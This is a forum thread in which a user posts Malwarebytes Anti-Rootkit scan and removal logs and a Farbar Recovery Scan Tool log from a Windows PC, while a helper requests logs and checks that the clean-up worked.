\SystemRoot\System32\drivers\HIDPARSE.SYS
\SystemRoot\System32\drivers\usbhub.sys
\SystemRoot\system32\drivers\nvhda64v.sys
\SystemRoot\System32\drivers\UsbHub3.sys
\SystemRoot\system32\drivers\RTKVHD64.sys
\SystemRoot\system32\drivers\MBfilt64.sys
\SystemRoot\System32\drivers\asmthub3.sys
\SystemRoot\System32\drivers\kbdhid.sys
\SystemRoot\System32\drivers\kbdclass.sys
\SystemRoot\System32\drivers\mouhid.sys
\SystemRoot\System32\drivers\mouclass.sys
\SystemRoot\System32\drivers\usbccgp.sys
\SystemRoot\System32\drivers\hidusb.sys
\SystemRoot\system32\DRIVERS\lvuvc64.sys
\SystemRoot\system32\drivers\usbaudio.sys
\SystemRoot\system32\DRIVERS\lvrs64.sys
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\win32kfull.sys
\SystemRoot\System32\win32kbase.sys
\SystemRoot\System32\Drivers\dump_diskdump.sys
\SystemRoot\System32\Drivers\dump_iaStorA.sys
\SystemRoot\System32\Drivers\dump_dumpfve.sys
\SystemRoot\System32\drivers\dxgmms2.sys
\SystemRoot\System32\drivers\monitor.sys
\SystemRoot\System32\TSDDD.dll
\SystemRoot\System32\cdd.dll
\SystemRoot\system32\drivers\mmcss.sys
\SystemRoot\system32\drivers\luafv.sys
\SystemRoot\system32\drivers\wcifs.sys
\SystemRoot\system32\drivers\storqosflt.sys
\SystemRoot\system32\DRIVERS\avgntflt.sys
\SystemRoot\System32\drivers\registry.sys
\SystemRoot\system32\drivers\lltdio.sys
\SystemRoot\system32\drivers\mslldp.sys
\SystemRoot\system32\drivers\rspndr.sys
\SystemRoot\System32\DRIVERS\wanarp.sys
\SystemRoot\system32\DRIVERS\nwifi.sys
\SystemRoot\system32\drivers\ndisuio.sys
\SystemRoot\system32\drivers\HTTP.sys
\SystemRoot\system32\DRIVERS\bowser.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\System32\drivers\mpsdrv.sys
\SystemRoot\system32\DRIVERS\mrxsmb20.sys
\SystemRoot\system32\DRIVERS\avnetflt.sys
\SystemRoot\System32\DRIVERS\srvnet.sys
\??\C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys
\SystemRoot\system32\DRIVERS\mrxsmb10.sys
\SystemRoot\system32\drivers\peauth.sys
\SystemRoot\System32\drivers\tcpipreg.sys
\SystemRoot\system32\drivers\Ndu.sys
\SystemRoot\System32\DRIVERS\srv2.sys
\SystemRoot\System32\DRIVERS\srv.sys
\SystemRoot\system32\drivers\WudfPf.sys
\SystemRoot\System32\drivers\condrv.sys
\SystemRoot\System32\drivers\tunnel.sys
\SystemRoot\system32\drivers\LGVirHid.sys
\??\C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys
\??\C:\WINDOWS\system32\drivers\mbamchameleon.sys
\??\C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys
----------- End -----------
Done!

Scan started
Database versions:
  main:    v2017.08.01.04
  rootkit: v2017.05.27.01

<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffbd0f80dda060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffbd0f80d989f0, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffbd0f80dda060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xffffbd0f7ca6d5c0, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffbd0f7f691060, DeviceName: \Device\00000036\, DriverName: \Driver\iaStorA\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
Done!
Drive 0
This is a System drive
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: BE291492

Partition information:

    Partition 0 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 2048  Numsec = 716800
    Partition is bootable
    Partition file system is NTFS

    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 718848  Numsec = 498475696
    Partition is not bootable
    Partition file system is NTFS

    Partition 2 type is Other (0x27)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 499195904  Numsec = 919552
    Partition is not bootable
    Partition file system is NTFS

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable

Disk Size: 256060514304 bytes
Sector size: 512 bytes

Done!
Physical Sector Size: 512
Drive: 1, DevicePointer: 0xffffbd0f80dd9060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffbd0f80d969f0, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffbd0f80dd9060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
DevicePointer: 0xffffbd0f7f68cc30, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffbd0f7f68e060, DeviceName: \Device\00000037\, DriverName: \Driver\iaStorA\
------------ End ----------
Alternate DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
Drive 1
Scanning MBR on drive 1...
Inspecting partition table:
This drive is a GPT Drive.
MBR Signature: 55AA
Disk Signature: 0

GPT Protective MBR Partition information:

    Partition 0 type is EFI-GPT (0xee)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 1  Numsec = 4294967295

    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

GPT Partition information:

    GPT Header Signature 4546492050415254
    GPT Header Revision 65536 Size 92 CRC 2062005913
    GPT Header CurrentLba = 1 BackupLba 15628064767
    GPT Header FirstUsableLba 34  LastUsableLba 15628064734
    GPT Header Guid d80aac34-b589-4897-a2e0-164b73895348
    GPT Header Contains 128 partition entries starting at LBA 2
    GPT Header Partition entry size = 128

    Backup GPT header Signature 4546492050415254
    Backup GPT header Revision 65536 Size 92 CRC 2062005913
    Backup GPT header CurrentLba = 15628064767 BackupLba 1
    Backup GPT header FirstUsableLba 34  LastUsableLba 15628064734
    Backup GPT header Guid d80aac34-b589-4897-a2e0-164b73895348
    Backup GPT header Contains 128 partition entries starting at LBA 15628064735
    Backup GPT header Partition entry size = 128

    Partition 0 Type e3c9e316-b5c-4db8-817d-f92df0215ae
    Partition ID 73a4163a-cae1-48f4-bd5c-dcb8e3d7543
    FirstLBA 34  Last LBA 262177
    Attributes 0
    Partition Name         Microsoft reserved partition

    Partition 1 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7
    Partition ID f19d7015-d86c-497e-989-1722d24df3b
    FirstLBA 264192  Last LBA 7814162431
    Attributes 0
    Partition Name                 Basic data partition

    Partition 2 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7
    Partition ID a8af2a8a-ee54-438d-9d2a-9d9225f73da9
    FirstLBA 7814162432  Last LBA 15628060671
    Attributes 0
    Partition Name                 Basic data partition

Disk Size: 8001569161216 bytes
Sector size: 512 bytes

Done!
File "C:\Users\Martin Walser\AppData\Local\Comms\UnistoreDB\store.vol" is sparse (flags = 32768)
File "C:\Windows\System32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat" is sparse (flags = 32768)
Scan finished
=======================================


Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-2048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-1-718848-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-2-499195904-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-r.mbam...
Removal finished
         
The image preview function doesn't seem to work here. Here is the link to the images:
https://www.dropbox.com/sh/dksnxf48h48nwcg/AACuuxEnLIG-M1E9LUG5kUtRa?dl=0

Edited by Lost_Viking (01.08.2017 at 14:06)

01.08.2017, 14:07   #8
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™

Uh, and once again you didn't read properly.

If anything is found again, repeat the CleanUp process.
__________________
"The truth is usually just an excuse for a lack of imagination." (Elim Garak)


01.08.2017, 14:18   #9
Lost_Viking

But I did do that.
Quote:
Quote from Lost_Viking
The second pass did not report anything suspicious anymore

Here is the log with no findings. I thought you didn't need to see that one anymore.

Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2017.08.01.04
  rootkit: v2017.05.27.01

Windows 10 x64 NTFS
Internet Explorer 11.483.15063.0
M*** W**** :: SILENTDRAGON [administrator]

01.08.2017 12:41:02
mbar-log-2017-08-01 (12-41-02).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 308076
Time elapsed: 7 minute(s), 49 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)
         

Edited by Lost_Viking (01.08.2017 at 14:25)

01.08.2017, 14:52   #10
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™

OK, I always want to see the log that goes with it.

Does FRST work now?

01.08.2017, 14:55   #11
Lost_Viking

Hehe, no offence about the reading properly.

Quote:
Quote from Lost_Viking

The second pass did not report anything suspicious anymore

Edit: FRST64.exe would work now. This time, though, I'll wait for your instructions.
Yes, it works.

01.08.2017, 14:56   #12
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™

And the log for it??!

01.08.2017, 15:47   #13
Lost_Viking

FRST



Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 31-07-2017
durchgeführt von **** (Administrator) auf SILENTDRAGON (01-08-2017 15:01:50)
Gestartet von C:\Users\****\Desktop
Geladene Profile: **** &  (Verfügbare Profile: ****)
Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avguard.exe
(IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\SoftwareUpdater\Avira.SoftwareUpdater.ServiceHost.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\VPN\Avira.VpnService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.SpeedupService.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Electronic Arts) G:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.UI.Systray.exe
(IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe
(IObit) C:\Program Files (x86)\IObit\Smart Defrag\SmartDefrag.exe
(Microsoft Corporation) C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avshadow.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech, Inc.) C:\Program Files\Common Files\logishrd\KHAL3\KHALMNPR.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(Logitech Inc.) C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
() C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
(Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
(Saitek) C:\Program Files\SmartTechnology\Software\SaiMfd.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(TomTom) C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Google, Inc) C:\Users\****\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Dropbox, Inc.) C:\Users\****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Wargaming.net) G:\Games\World_of_Warships\WargamingGameUpdater.exe
(Akamai Technologies, Inc.) C:\Users\****\AppData\Local\Akamai\netsession_win.exe
(Akamai Technologies, Inc.) C:\Users\****\AppData\Local\Akamai\netsession_win.exe
(Valve Corporation) G:\Program Files (x86)\Steam\Steam.exe
(© 2015 Microsoft Corporation) C:\Users\****\AppData\Local\Microsoft\BingSvc\BingSvc.exe
(Valve Corporation) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Digital Wave Ltd.) C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
(Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\SMService.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\ClassicStart.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\StartMenu_Hook.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\InstallServices.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8241.41275.0_x64__8wekyb3d8bbwe\HxOutlook.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8241.41275.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Hammer & Chisel, Inc.) C:\Users\****\AppData\Local\Discord\app-0.0.297\Discord.exe
(Hammer & Chisel, Inc.) C:\Users\****\AppData\Local\Discord\app-0.0.297\Discord.exe
(Hammer & Chisel, Inc.) C:\Users\****\AppData\Local\Discord\app-0.0.297\Discord.exe
(Dropbox, Inc.) C:\Users\****\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Dropbox, Inc.) C:\Users\****\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Dropbox, Inc.) C:\Users\****\AppData\Roaming\Dropbox\bin\Dropbox.exe
() C:\Users\****\AppData\Roaming\Dropbox\bin\QtWebEngineProcess.exe
(Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\Spotify.exe
(ZeniMax Online Studios) G:\Program Files (x86)\The Elder Scrolls Online\Launcher\Bethesda.net_Launcher.exe
(IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9197568 2017-05-15] (Realtek Semiconductor)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-05-28] (Intel Corporation)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-26] (Logitech, Inc.)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [17406072 2017-01-24] (Logitech Inc.)
HKLM-x32\...\Run: [Avira SystrayStartTrigger] => C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe [97512 2017-06-13] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\Antivirus\avgnt.exe [918008 2017-07-14] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [Avira System Speedup User Starter] => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [66656 2017-06-28] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-07-12] (Oracle Corporation)
HKLM-x32\...\Run: [TrojanScanner] => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [3673656 2017-08-01] (Simply Super Software)
HKLM-x32\...\Winlogon: [Userinit] 
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9818328 2017-06-30] (Piriform Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Advanced SystemCare 10] => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe [3924256 2017-05-17] (IObit)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Spotify Web Helper] => C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-04-19] (Spotify Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9818328 2017-06-30] (Piriform Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Advanced SystemCare 10] => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe [3924256 2017-05-17] (IObit)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Spotify Web Helper] => C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-04-19] (Spotify Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
Startup: C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2017-08-01]
ShortcutTarget: Dropbox.lnk -> C:\Users\****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60
Tcpip\..\Interfaces\{f81baef3-2886-44c5-9a55-1cfe2ed39eeb}: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60
ManualProxies: 

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.ch/
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.ch/
SearchScopes: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Kein Name -> {AF949550-9094-4807-95EC-D1C317803333} -> Keine Datei
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_141\bin\ssv.dll [2017-07-25] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_141\bin\jp2ssv.dll [2017-07-25] (Oracle Corporation)

FireFox:
========
FF ProfilePath: C:\Users\****\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default [2017-08-01]
FF Extension: (Avira Browser Safety) - C:\Users\****\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-08-08] [ist nicht signiert]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.141.2 -> C:\Program Files (x86)\Java\jre1.8.0_141\bin\dtplugin\npDeployJava1.dll [2017-07-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.141.2 -> C:\Program Files (x86)\Java\jre1.8.0_141\bin\plugin2\npjp2.dll [2017-07-25] (Oracle Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=3 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
